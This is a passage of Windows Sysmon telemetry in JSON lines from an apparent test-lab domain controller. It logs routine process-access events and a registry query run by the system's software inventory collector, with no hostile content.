C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-00107BD50400}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-00107BD50400}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.386\r\nSourceProcessGUID: {41C8662E-1FA0-5F25-0000-00107BD50400}\r\nSourceProcessId: 4936\r\nSourceThreadId: 4956\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-0010FED40400}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.386","SourceProcessGUID":"{41C8662E-1FA0-5F25-0000-00107BD50400}","SourceProcessId":"4936","SourceThreadId":"4956","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-0010FED40400}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.409\r\nProcessGuid: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nProcessId: 4976\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FA0-5F25-0000-0010FED40400}\r\nParentProcessId: 4928\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.409","ProcessGuid":"{41C8662E-1FA0-5F25-0000-001072D70400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FA0-5F25-0000-0010FED40400}","ParentProcessId":"4928","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
